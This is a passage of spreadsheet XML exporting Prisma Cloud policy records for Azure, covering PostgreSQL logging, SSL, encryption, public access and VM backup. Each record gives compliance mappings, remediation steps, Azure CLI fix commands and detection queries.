          <t>ISO/IEC 27002:2013, CSA CCM v.4.0.6, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), testazure, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, ITSG-33, ISO/IEC 27002:2013, ITSG-33, CIS Controls v7.1, TX-RAMP Level 2, CSA CCM v.4.0.1, ISO 27002:2022, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, New Zealand Information Security Manual (NZISM v3.4), PCI DSS v3.2.1, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, Fedramp (Low), CyberSecurity Law of the People's Republic of China, Copy of CIS v1.2.0 (Azure), Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, CIS v1.1 (Azure), ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, TX-RAMP Level 1, NIST SP 800-171 Revision 2, CRI Profile v1.2.1, CIS v1.2.0 (Azure), NIST 800-53 Rev 5, TX-RAMP Level 2, NIST SP 800-171 Revision 3, Fedramp (Moderate), HITRUST v.9.4.2 [Deprecated], CDC NIST 800-53 Rev4, ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, CSA CCM v4.0.12, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, CSA CCM v.4.0.1, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, CRI Profile v2.0, APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, SOC 2, NIST CSF v2.0, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, FFIEC, PCI DSS v4.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, CIS Controls v8.1, jneytchev-fedramp-low, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, PCI DSS v3.2.1, NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2380" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2380" s="2" t="inlineStr"/>
      <c r="D2380" t="inlineStr"/>
      <c r="E2380" t="inlineStr"/>
      <c r="F2380" t="inlineStr"/>
      <c r="G2380" t="b">
        <v>0</v>
      </c>
      <c r="H23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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2380" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="K2380" t="inlineStr">
        <is>
          <t>Azure PostgreSQL database server with log duration parameter disabled</t>
        </is>
      </c>
      <c r="L2380" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2380" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2380" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2380" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2380" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2380" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2380" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2380" t="inlineStr"/>
      <c r="T2380" t="b">
        <v>1</v>
      </c>
      <c r="U2380" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2380" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="W2380" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database servers for which server parameter is not set for log duration. Enabling log_duration helps the PostgreSQL Database to Logs the duration of each completed SQL statement which in turn generates query and error logs. Query and error logs can be used to identify, troubleshoot, and repair configuration errors and sub-optimal performance.</t>
        </is>
      </c>
      <c r="X2380" t="inlineStr">
        <is>
          <t>1. Login to Azure console.
2. Navigate to 'Azure Database for PostgreSQL servers' dashboard
3. Click on the alerted database name
4. Go to 'Server parameters' under 'Settings' block
5. From the list of parameters find 'log_duration' and set it to on
6. Click on 'Save' button from top menu to save the change.</t>
        </is>
      </c>
      <c r="Y2380" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.DBforPostgreSQL servers/configuration/*' permission. Successful execution will enable log_duration which helps the PostgreSQL database to log the duration of each completed SQL statement,
which in turn generates query and error logs.",
'impact': 'enables log_duration in Azure PostgreSQL database servers',
'cliScriptTemplate': 'az postgres server configuration set --resource-group $resourceGroup --server-name $resourceName --name log_duration --value on'</t>
        </is>
      </c>
      <c r="Z2380" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-server' AND json.rule = "configurations.value[?(@.name=='log_duration')].properties.value equals OFF or configurations.value[?(@.name=='log_duration')].properties.value equals off"</t>
        </is>
      </c>
      <c r="AA2380" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2380" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2380" t="inlineStr">
        <is>
          <t>PC-AZR-PG-429</t>
        </is>
      </c>
      <c r="AD2380" t="b">
        <v>1</v>
      </c>
      <c r="AE2380" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2380" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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0" t="inlineStr">
        <is>
          <t>f6e50db0-4774-480f-b6c6-1126fa21a22a</t>
        </is>
      </c>
      <c r="AI2380" t="inlineStr">
        <is>
          <t>879c324f-b9aa-4c3c-829c-35febbe80981</t>
        </is>
      </c>
      <c r="AJ2380" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2380" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2381">
      <c r="A2381" t="inlineStr">
        <is>
          <t>HIPAA, PCI DSS v4.0, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, NIST CSF v2.0, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27002:2013, CIS v1.3.1 (Azure), Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, FFIEC, ITSG-33, CIS v1.2.0 (Azure), CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, CIS v2.1.0 (Azure) Level 1, ISO/IEC 27002:2013, Azure Security Benchmark (v3), NIST SP 800-171 Revision 2, CIS Controls v7.1, CIS v2.0.0 (Azure) Level 1, CRI Profile v1.2.1, ISO 27002:2022, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, PCI DSS v4.0, ACSC Information Security Manual (ISM), DORA, NIST CSF v2.0, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v4.0, NIST 800-53 Rev4, CIS v1.1 (Azure), CIS v1.4.0 (Azure), ISO/IEC 27018:2019, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CIS v1.5.0 (Azure) - Level 1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, CRI Profile v1.2.1, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v3.2.1, CRI Profile v2.0, HIPAA, Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS Controls v8, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), CIS v1.3.0 (Azure), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, Azure Security Benchmark (v2), CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2381" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2381" s="2" t="inlineStr"/>
      <c r="D2381" t="inlineStr"/>
      <c r="E2381" t="inlineStr"/>
      <c r="F2381" t="inlineStr"/>
      <c r="G2381" t="b">
        <v>1</v>
      </c>
      <c r="H23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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2381" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="K2381" t="inlineStr">
        <is>
          <t>Azure PostgreSQL database server with SSL connection disabled</t>
        </is>
      </c>
      <c r="L2381" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2381" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2381" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2381" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2381" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2381" t="inlineStr">
        <is>
          <t>Requirement 4</t>
        </is>
      </c>
      <c r="R2381" t="inlineStr">
        <is>
          <t>4.2.1.2</t>
        </is>
      </c>
      <c r="S2381" t="inlineStr"/>
      <c r="T2381" t="b">
        <v>1</v>
      </c>
      <c r="U2381" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2381" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="W2381" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database servers for which SSL enforce status is disabled. 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is>
      </c>
      <c r="X2381" t="inlineStr">
        <is>
          <t>1. Login to Azure console
2. Navigate to 'Azure Database for PostgreSQL servers' dashboard
3. Click on the alerted database name
4. Go to 'Connection security' under 'Settings' block.
5. In 'SSL settings' block, for 'Enforce SSL connection' field, click on 'Enabled’ on the toggle button
6. Click on 'Save' button from top menu to save the change. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-10
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-10</t>
        </is>
      </c>
      <c r="Y2381" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.DBforPostgreSQL servers/configuration/*' permission. Successful execution will enable SSL enforce which helps to provide a new layer of security,
by connecting database server to client applications using Secure Sockets Layer (SSL).",
'impact': 'enables SSL enforce on Azure PostgreSQL database servers',
'cliScriptTemplate': 'az postgres server update --resource-group $resourceGroup --name $resourceName --ssl-enforcement Enabled'</t>
        </is>
      </c>
      <c r="Z2381" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-server' AND json.rule = 'properties.sslEnforcement contains Disabled'
{"category":"Networking","resourceTypes":["azurerm_postgresql_server"]}</t>
        </is>
      </c>
      <c r="AA2381" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2381" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2381" t="inlineStr">
        <is>
          <t>PC-AZR-PG-433-CKV_AZURE_29</t>
        </is>
      </c>
      <c r="AD2381" t="b">
        <v>1</v>
      </c>
      <c r="AE2381" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2381" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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1" t="inlineStr">
        <is>
          <t>bf4ad407-076c-40b9-a8fa-a0c80352a744</t>
        </is>
      </c>
      <c r="AI2381" t="inlineStr">
        <is>
          <t>ccfaf3f9-0bbf-4235-82ac-8910058ee060</t>
        </is>
      </c>
      <c r="AJ2381" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2381" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2382">
      <c r="A2382" t="inlineStr">
        <is>
          <t>HIPAA, Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022, CSA CCM v.4.0.6, FFIEC, ISO/IEC 27001:2022, kfirdaus AWS Account-CS, CIS Controls v8, CIS Controls v8.1, CIS Controls v7.1, CIS v2.0.0 (Azure) Level 1, ISO/IEC 27001:2022, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), New Zealand Information Security Manual (NZISM v3.4), NYDFS 23 CRR-NY 500.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v1.2.1, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, Copy of CIS Controls v8, PCI DSS v4.0, FFIEC, CIS v1.4.0 (Azure), MLPS 2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.5.0 (Azure) - Level 1, DORA, CIS v2.1.0 (Azure) Level 1, Copy of ACSC Information Security Manual (ISM)-clone, Copy of Azure Security Benchmark (v3), PCI DSS v4.0, NIST CSF v2.0, kashan ACSC Information Security Manual (ISM), CRI Profile v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of Azure Security Benchmark (v3), NIST SP 800-171 Revision 3, Azure Security Benchmark (v3), kfirdaus AWS Account-CS, PCI DSS v4.0, ACSC Information Security Manual (ISM), Microsoft Cloud Security Benchmark v1, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, Copy of New Zealand Information Security Manual (NZISM v3.4), ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0, HIPAA, PCI DSS v4.0, Azure Security Benchmark (v3), NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, Copy of ACSC Information Security Manual (ISM)-clone, CRI Profile v2.0, ACSC Information Security Manual (ISM), CRI Profile v1.2.1, PCI DSS v4.0, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2382" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2382" s="2" t="inlineStr"/>
      <c r="D2382" t="inlineStr"/>
      <c r="E2382" t="inlineStr"/>
      <c r="F2382" t="inlineStr"/>
      <c r="G2382" t="b">
        <v>1</v>
      </c>
      <c r="H23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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2382" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="K2382" t="inlineStr">
        <is>
          <t>Azure PostgreSQL database server Infrastructure double encryption is disabled</t>
        </is>
      </c>
      <c r="L2382" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2382" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2382" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2382" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2382" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2382" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2382" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2382" t="inlineStr"/>
      <c r="T2382" t="b">
        <v>0</v>
      </c>
      <c r="U2382" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2382" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="W2382" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database servers in which Infrastructure double encryption is disabled. Infrastructure double encryption adds a second layer of encryption using service-managed keys. It is recommended to enable infrastructure double encryption on PostgreSQL database servers so that encryption can be implemented at the layer closest to the storage device or network wires.
For more details: 
https://docs.microsoft.com/en-us/azure/postgresql/concepts-infrastructure-double-encryption</t>
        </is>
      </c>
      <c r="X2382" t="inlineStr">
        <is>
          <t>Configuring Infrastructure double encryption for Azure Database for PostgreSQL is only allowed during server create. Once the server is provisioned, you cannot change the storage encryption.
To create an Azure Database for PostgreSQL server with Infrastructure double encryption, follow below URL:
https://docs.microsoft.com/en-us/azure/postgresql/howto-double-encryption
NOTE: Using Infrastructure double encryption will have performance impact on the Azure Database for PostgreSQL server due to the additional encryption process.</t>
        </is>
      </c>
      <c r="Y2382" t="inlineStr"/>
      <c r="Z2382" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-server' AND json.rule = (sku.tier equals GeneralPurpose or sku.tier equals MemoryOptimized) and properties.userVisibleState equals Ready and properties.infrastructureEncryption equals Disabled</t>
        </is>
      </c>
      <c r="AA2382" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2382" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2382" t="inlineStr">
        <is>
          <t>PC-AZR-PG-819</t>
        </is>
      </c>
      <c r="AD2382" t="b">
        <v>1</v>
      </c>
      <c r="AE2382" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2382" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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2" t="inlineStr">
        <is>
          <t>c4546c5c-11b3-4252-a1bd-b9ae64bb903d</t>
        </is>
      </c>
      <c r="AI2382" t="inlineStr">
        <is>
          <t>c044347d-d28b-4999-bb14-f275567a2c83</t>
        </is>
      </c>
      <c r="AJ2382" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2382" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2383">
      <c r="A2383" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2022.2.1</t>
        </is>
      </c>
      <c r="B2383" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2383" s="2" t="inlineStr"/>
      <c r="D2383" t="inlineStr"/>
      <c r="E2383" t="inlineStr"/>
      <c r="F2383" t="inlineStr"/>
      <c r="G2383" t="b">
        <v>1</v>
      </c>
      <c r="H23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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2383" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="K2383" t="inlineStr">
        <is>
          <t>Azure PostgreSQL database server deny public network access setting is not set</t>
        </is>
      </c>
      <c r="L2383" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2383" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2383" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2383" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2383" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2383" t="inlineStr">
        <is>
          <t>Continuous Monitoring</t>
        </is>
      </c>
      <c r="R2383" t="inlineStr">
        <is>
          <t>MON-01.3</t>
        </is>
      </c>
      <c r="S2383" t="inlineStr"/>
      <c r="T2383" t="b">
        <v>0</v>
      </c>
      <c r="U2383" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2383" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="W2383" t="inlineStr">
        <is>
          <t>This policy identifies Azure PostgreSQL database servers that have Deny public network access setting is not set. When 'Deny public network access' is set to yes, only private endpoint connections will be allowed to access this resource. It is highly recommended to set Deny public network access setting to Yes, which would allow PostgreSQL database server to be accessed only through private endpoints.
Note: This feature is available in all Azure regions where Azure Database for PostgreSQL - Single server supports General Purpose and Memory Optimized pricing tiers.</t>
        </is>
      </c>
      <c r="X2383" t="inlineStr">
        <is>
          <t>1. Login to Azure portal.
2. Navigate to 'Azure Database for PostgreSQL servers'
3. Click on the reported PostgreSQL server instance you want to modify 
4. Select 'Connection security' under 'Settings' from left panel 
5. For 'Deny public network access' ensure 'Deny public network access' is set to 'Yes'
6. Click on 'Save'
Note: When 'Deny public network access' is set to yes, only private endpoint connections will be allowed to access this resource.</t>
        </is>
      </c>
      <c r="Y2383" t="inlineStr"/>
      <c r="Z2383" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-server' AND json.rule = properties.userVisibleState equal ignore case Ready and sku.tier does not equal ignore case Basic and properties.publicNetworkAccess equal ignore case Enabled</t>
        </is>
      </c>
      <c r="AA2383" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2383" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2383" t="inlineStr">
        <is>
          <t>PC-AZR-PG-889</t>
        </is>
      </c>
      <c r="AD2383" t="b">
        <v>1</v>
      </c>
      <c r="AE2383" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2383" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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3" t="inlineStr">
        <is>
          <t>0d18dc84-d4fb-4c57-9087-a3c10054beec</t>
        </is>
      </c>
      <c r="AI2383" t="inlineStr">
        <is>
          <t>9eee6a8e-18b2-4927-b5c1-87e8701c9487</t>
        </is>
      </c>
      <c r="AJ2383" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2383" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2384">
      <c r="A2384" t="inlineStr">
        <is>
          <t>CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2384" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2384" s="2" t="inlineStr"/>
      <c r="D2384" t="inlineStr"/>
      <c r="E2384" t="inlineStr"/>
      <c r="F2384" t="inlineStr"/>
      <c r="G2384" t="b">
        <v>1</v>
      </c>
      <c r="H23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84" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2384" t="inlineStr">
        <is>
          <t>azure-recovery-service</t>
        </is>
      </c>
      <c r="K2384" t="inlineStr">
        <is>
          <t>Azure Virtual Machine not protected with Azure Backup</t>
        </is>
      </c>
      <c r="L2384" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2384" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2384" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2384" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2384" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2384" t="inlineStr">
        <is>
          <t>BR</t>
        </is>
      </c>
      <c r="R2384" t="inlineStr">
        <is>
          <t>BR-1</t>
        </is>
      </c>
      <c r="S2384" t="inlineStr"/>
      <c r="T2384" t="b">
        <v>0</v>
      </c>
      <c r="U2384" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2384" t="inlineStr">
        <is>
          <t>azure-recovery-service-backup-protected-item</t>
        </is>
      </c>
      <c r="W2384" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are not protected by Azure Backup.
Without Azure Backup, VMs are at risk of data loss due to accidental deletion, corruption, or ransomware attacks. Unprotected VMs may also not comply with organizational data retention policies and regulatory requirements.
As a best practice, it is recommended to configure Azure Backup for all VMs to ensure data protection and enable recovery options in case of unexpected failures or incidents.</t>
        </is>
      </c>
      <c r="X2384" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal and search for 'Virtual machines'.
2. Select 'Virtual machines'.
3. Select the reported Virtual machine.
4. Under 'Backup + disaster recovery' select 'Backup'.
5. In the 'Backup' pane, select a 'Recovery Services vault'. If no vault exists, click 'Create new' to make a new vault.
6. Choose the appropriate 'Policy sub type'. It's recommended to select 'Enhanced'.
7. Next, select or create a 'Backup Policy' that defines when backups will run and how long they will be kept.
8. From the 'Disks' dropdown, check all the disks you want to back up. Also, check the 'Include future disks' box to ensure new disks are automatically included.
9. Click 'Enable Backup'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-are-backed-up-using-azure-backup
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-are-backed-up-using-azure-backup</t>
        </is>
      </c>
      <c r="Y2384" t="inlineStr"/>
      <c r="Z2384" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-recovery-service-backup-protected-item' AND json.rule = properties.workloadType equal ignore case VM as X; config from cloud.resource where api.name = 'azure-vm-list' AND json.rule = powerState contains running as Y; filter 'not $.Y.id equal ignore case $.X.properties.virtualMachineId'; show Y;
{"category":"General","resourceTypes":["azurerm_automation_variable_bool", "azurerm_automation_variable_string", "azurerm_automation_variable_int", "azurerm_automation_variable_datetime"]}</t>
        </is>
      </c>
      <c r="AA2384" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2384" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2384" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-1278-CKV2_AZURE_12</t>
        </is>
      </c>
      <c r="AD2384" t="b">
        <v>1</v>
      </c>
      <c r="AE2384" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2384" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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84" t="inlineStr">
        <is>
          <t>db33dfab-90da-4e41-a13b-30c52ba1c187</t>
        </is>
      </c>
      <c r="AI2384" t="inlineStr">
        <is>
          <t>b312bd01-fc58-43a3-aa37-d67fe3bd01eb</t>
        </is>
      </c>
      <c r="AJ2384" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2384" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2385">
      <c r="A2385" t="inlineStr">
        <is>
